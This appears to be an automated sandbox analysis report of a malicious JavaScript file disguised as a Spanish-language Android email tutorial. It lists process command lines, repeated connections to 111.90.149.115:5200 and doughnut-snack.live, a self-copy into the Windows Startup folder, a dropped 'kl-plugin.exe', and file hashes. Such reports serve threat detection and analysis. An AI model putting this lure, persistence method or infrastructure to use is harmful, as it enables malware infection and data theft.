"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x21c,0x10c,0x7ff77a6e5460,0x7ff77a6e5470,0x7ff77a6e5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5696 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| US | 52.153.255.201:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | smartscreen-prod.microsoft.com | udp |
| US | 20.98.16.82:443 | smartscreen-prod.microsoft.com | tcp |
| US | 20.98.16.82:443 | smartscreen-prod.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | doughnut-snack.live | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 131.253.33.200:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.203:443 | tcp | |
| NL | 23.73.0.171:443 | tcp | |
| NL | 23.73.0.171:443 | tcp | |
| NL | 23.73.0.171:443 | tcp | |
| NL | 23.73.0.171:443 | tcp | |
| US | 131.253.33.203:443 | tcp | |
| FR | 2.22.22.155:443 | tcp | |
| US | 20.36.253.92:443 | tcp | |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| NL | 54.192.86.39:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 204.79.197.219:443 | tcp | |
| NL | 23.51.68.110:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.219:443 | tcp | |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| N/A | 127.0.0.1:5985 | tcp | |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 209.197.3.8:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 209.197.3.8:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
Files
C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js
| MD5 | 1749a68af6573286cd256660e513a837 |
| SHA1 | 32e8c409384639eaf8c12de9d673b089f13eab64 |
| SHA256 | beedfc01af698a1413c76a35899d15b1c940c824cdf96e406c668b193bc78229 |
| SHA512 | 364d8b1aa036ffeabd950b622e3d3553c00bf354547942a054ec722776ff43d63eff1f3f022c35090b4fb50d83d5974515356b6a772ae3de776fabc9351675b1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\kl-plugin.exe
| MD5 | 7099a939fa30d939ccceb2f0597b19ed |
| SHA1 | 37b644ef5722709cd9024a372db4590916381976 |
| SHA256 | 272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a |
| SHA512 | 6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721 |
memory/2792-420-0x00007FFF98910000-0x00007FFF98911000-memory.dmp
\??\pipe\LOCAL\crashpad_4948_RRMLOVJMEUVWOWBW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.pdf
| MD5 | 2d711f8b232b90c6f8d4b143f7dbbc53 |
| SHA1 | 54c0415289483e544be2b04f16a1aee060d8edfc |
| SHA256 | 1fec2880b574abd9dfa7b73f686d8422c7946d059c3d48e95676a6df89b8e919 |
| SHA512 | 6151120ba3aa71b1ed2df0ce957535100c8bbc3d5517ddd50014a9262162a131961d849feab636d33945be57f7cf740b07db3d95fe38b0ce6662a0ee11a8f2cb |
memory/2956-441-0x000002C3EFB30000-0x000002C3EFB40000-memory.dmp
memory/2956-442-0x000002C3EFB90000-0x000002C3EFBA0000-memory.dmp
memory/2956-443-0x000002C3F28A0000-0x000002C3F28A4000-memory.dmp
memory/540-460-0x00000234261F0000-0x00000234261F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_269696345\0c0bbbe7-df62-4052-9ac7-7310194c8a93
| MD5 | d59b3234b2fec0b8a6f6b3ddb44dd71b |
| SHA1 | 36ceeae4dd4ad83f7be20b49099513bc22a11e0f |
| SHA256 | 16c91f3e0fd6a89648882f3fb34ccd508c4d7b7e7ac727d145584e047eae98aa |
| SHA512 | 193f7f936fb3c94f383c04c6f686d5ea65a309bb0e49ec924b34d9d0b4bb9248a9ced1d6a590e6a7536aa45677567a55be3d9cfd75718d9dd95de5664e85739d |
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_1493607011\b22f5f18-f7ea-4290-929d-b13c03908334
| MD5 | a36d70bcd9333175811c53122f7d2c1d |
| SHA1 | 9a9a0c0ac2fc1db6e7b78868c8d4c96d747b8f1c |
| SHA256 | 26123bef7d73536450862d2c4d44963d720aa80b6fc2d8496f559cb9c1fdeb00 |
| SHA512 | e69aee2d91c50dd63030bd64cd12b5120c1db9871caf3c26b2cbf29ff96891b5f2e7d1388e4b731f77d7fb24904f379a6a8d5c1b2aacf8a8501fd0111ab0caf5 |
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_973508087\dca58617-a795-442b-b16e-b2969c2c4ee1
| MD5 | e6e69ad11442f76dc1125af7473e7f2e |
| SHA1 | 69ffc1838d22fc2841131f073620393609a8cfe3 |
| SHA256 | b630735a31b7ed24c53d54346ca56b62a403b4f9c21fae9af4511b006e587b56 |
| SHA512 | c70a7b4e0b238f3766d64a915d44987c29cf3164c0a6cc1d14537ad0220960d284de9e3d28a248231f648390ac2e7f480306a1b562c62c2120bbf81415fca687 |